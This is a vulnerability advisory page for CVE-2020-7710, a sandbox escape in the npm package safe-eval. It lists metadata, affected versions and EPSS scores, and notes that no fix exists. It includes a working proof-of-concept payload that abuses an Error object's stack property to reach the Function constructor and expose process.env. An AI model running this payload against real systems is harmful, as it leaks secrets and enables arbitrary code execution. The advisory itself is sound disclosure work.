Data

Tools

Indexes

Applications

Experiments

Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWhycHEtcjM5OS13aGd3

Critical EPSS: 0.00513% (0.65483 Percentile) EPSS:
Permalink JSON

Sandbox Breakout / Arbitrary Code Execution in safe-eval

Affected Packages Affected Versions Fixed Versions
npm:safe-eval <= 0.4.1 No known fixed version
264 Dependent packages
2,730 Dependent repositories
187,874 Downloads last month

Affected Version Ranges

All affected versions

0.0.0, 0.1.0, 0.2.0, 0.3.0, 0.4.0, 0.4.1

All versions of safe-eval are vulnerable to Sandbox Escape leading to Remote Code Execution. The package fails to restrict access to the main context through Error objects. This may allow attackers to execute arbitrary code in the system.

Evaluating the payload

(function (){
  var ex = new Error
  ex.__proto__ = null
  ex.stack = {
    match: x => {
      return x.constructor.constructor("throw process.env")()
    }
  }
  return ex
})()

prints the contents of process.env.

Recommendation

No fix is currently available. Consider using an alternative package until a fix is made available.

References:

Identifiers

GHSA-hrpq-r399-whgw

CVE-2020-7710

Risk

Severity

Critical

EPSS

EPSS Percentage: 0.00513

EPSS Percentile: 0.65483

Classification

General

Source

GitHub Advisory Database

Origin

Unspecified

Repository

https://github.com/hacksparrow/safe-eval

Date and time

Published

almost 5 years ago

Updated

almost 2 years ago

API

JSON